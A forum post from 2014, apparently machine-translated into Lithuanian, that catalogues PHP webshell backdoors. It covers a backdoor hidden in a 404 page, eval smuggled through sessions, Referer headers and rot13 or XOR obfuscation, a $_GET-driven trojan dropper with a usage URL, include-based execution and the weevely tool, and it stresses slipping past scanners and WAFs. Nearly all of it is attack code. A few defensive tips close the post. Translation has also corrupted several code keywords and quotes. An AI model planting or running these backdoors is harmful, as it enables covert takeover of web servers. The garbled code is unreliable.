Mes traktuojame šias PHP užpakalinių durų programas su mokymosi mentalitetu, o daug PHP užpakalinių durų kodo leidžia mums pamatyti, kokie geranoriški yra programuotojai.
Galingos PHP užpakalinės durys vienu sakiniu
Tokio tipo užpakalinės durys leidžia svetainėms,Serverio administratoriai yra labai varginantys ir dažnai turi keisti metodus, kad galėtų atlikti įvairius aptikimus, o daugelio naujų rašymo metodų negalima atrasti ir išspręsti įprastais aptikimo metodais.
Šiandien suskaičiuosime keletą įdomių PHP Trojos arklių.
1. Slėpti PHP poniai naudojant 404 puslapius:
[mw_shl_code=php,true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Nerasta</title>
</head><body>
<h1>Nerasta</h1>
<p>Šiame serveryje nerastas prašomas URL.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 nerastas');
?>[/mw_shl_code]
404 puslapis yra dažniausiai naudojamas failas svetainėje, ir nedaugelis žmonių jį patikrins ir modifikuos po to, kai jis paprastai rekomenduojamas, todėl galime jį naudoti užpakalinėms durims paslėpti.
2. Be funkcijų paslėptas PHP vienu sakiniu:
[mw_shl_code=php,true]<?php
session_start();
$_POST['kodas'] && $_SESSION['theCode'] = trim($_POST['kodas']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Priskirkite $_POST['code'] $_SESSION['theCode'], tada vykdykite $_SESSION['theCode'], pabrėždami, kad nėra parašo kodo.
Jei kodui patikrinti naudosite nuskaitymo įrankį, jis nesukels pavojaus signalo ir pasieks tikslą.
3. Super slaptos PHP užpakalinės durys:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Vien tik GET funkcija yra Trojos arklys;
Kaip naudoti:
[mw_shl_code=php,true]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Po vykdymo dabartinis katalogas sugeneruoja c.php sakinį Trojos arklys, kai parametras A yra vertinamas, klaida Trojos arklys generuoti nepavyko, o kai jis bus patvirtintas, jis taip pat praneš apie klaidą, tačiau sugeneruos Trojos arklį, kurio negalima nuvertinti.
Lygio užklausa, kodas paleisti PHP backdoor:
Šis metodas įgyvendinamas su dviem failais, 1 failas
[mw_shl_code=php,true]<?php
//1.php
header('Turinio tipas:tekstas/html; simbolių rinkinys=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
2 dokumentas
[mw_shl_code=php,true]<?php
//2.php
header('Turinio tipas:tekstas/html; simbolių rinkinys=utf-8′);
//要执行的代码
$code= <<<KODAS
phpinfo();
KODAS;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= masyvas(
CURLOPT_URL = > $url,
CURLOPT_HEADER = > FALSE,
CURLOPT_RETURNTRANSFER = > TEISINGA,
CURLOPT_REFERER => $referer
);
curl_setopt_array ($ch, $options);
echocurl_exec ($ch);
?>[/mw_shl_code]
Paleiskite base64 užkoduotą kodą per HTTP užklausos HTTP_REFERER, kad pasiektumėte užpakalinių durų efektą.
Gerai pasinaudoti šia idėja apeiti waf.
4.PHP užpakalinių durų generatoriaus įrankis weevely
weevely yra PHP specifinis vienasWebshell nemokama programinė įranga, gali būti naudojama imituoti ryšio apvalkalą, panašų į telnet, Weevely paprastai naudojamas žiniatinklio programų išnaudojimui, paslėpti užpakalines duris arba naudoti telnet panašius metodus, o ne tinklalapio valdymą, serverio pusės PHP kodas, kurį sugeneravo Weevely, yra užkoduotas base64, todėl jis gali apgauti pagrindinę antivirusinę programinę įrangą ir IDS, Įkėlę serverio kodą, paprastai galite jį paleisti tiesiai per "Weevely".
Užpakalinėse duryse naudojamos funkcijos yra dažniausiai naudojamos eilučių apdorojimo funkcijos, o tokios funkcijos kaip eval ir sistema, kurios naudojamos kaip tikrinimo taisyklės, nebus rodomos tiesiogiai kode, todėl užpakalinių durų failas gali apeiti užpakalinių durų paieškos įrankio patikrinimą. Nuskaitymas naudojant tamsiosios grupės žiniatinklio užpakalinių durų aptikimo įrankį rodo, kad failui negresia.
Tai yra bendras įvadas, o atitinkami vartojimo metodai čia nepristatomi, paprastas mokslo populiarinimas.
4. Trys deformuoti vieno sakinio PHP Trojos arklys
Pirmasis:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Antrasis
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Parašykite http://site/2.php?_=assert&__=eval($_POST['pass']) slaptažodį virtuviniame peilyje.
Jei naudojate papildomus virtuvinio peilio duomenis, jie yra labiau paslėpti arba galite naudoti kitus injekcijos įrankius, nes jie pateikiami po to.
Trečiasis
[mw_shl_code=php,true] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'add'); [/mw_shl_code]
str_rot13 ("riny") yra užkoduotas eval, kuris visiškai vengia raktinių žodžių, neprarandant efekto, priversdamas žmones vemti kraują!
5. Galiausiai išvardinkite keletą pažangių PHP Trojos arklys galinių durų:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Prieiga"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[ManoFailas][tmp_name],$_FILES[Mano failas][vardas]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Prieiga"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Apibendrinant galima pasakyti, kad šias PHP užpakalines duris galima apibūdinti kaip užbaigtas, jei nesate atsargūs, tikrai būsite apgauti, o koks yra pagrindinis mūsų straipsnio prioritetas šiandien? Pagrindiniai punktai yra žemiau esančioje santraukoje!
Kaip elgtis su PHP vieno sakinio užpakalinėmis durimis:
Pabrėžiame keletą pagrindinių dalykų, o jei perskaitysite šį straipsnį, manau, kad nesate pasaulietis, todėl nebūsiu ilgai vėjuotas:
- Atkreipkite dėmesį į saugumą rašydami PHP programas
- Serverio žurnalo failus reikia dažnai skaityti ir kurti atsargines kopijas
- Griežtas teisių priskyrimas kiekvienai svetainei
- Dažnos dinaminių failų ir katalogų paketinės saugos peržiūros
- Sužinokite, kaip atlikti rankinį antivirusinį "Elgesio sprendimo tyrimą ir žudymą"
- Sekite naujienas arba įsiskverbkite į aktyvią kibernetinio saugumo stovyklą
- Net funkcija gali būti naudojama kaip taisyklė hierarchiniam serverio aplinkos apdorojimui
Manome, kad kai yra daugiau svetainių, kurias reikia valdyti, ir didelis duomenų kiekis, turėtume pagrįstai taikyti kai kuriuos pagalbinius įrankius, tačiau neturėtume visiškai pasikliauti šiais įrankiais, technologijos nuolat atnaujinamos ir tobulėja, svarbiausia, kad turėtumėte išmokti ir suprasti šių galingų užpakalinių durų žmonių rašymo mąstymą, o vaidmenų perkėlimas gali atnešti didesnę pažangą.
|
Paskelbta 2014-12-01 21:41:13
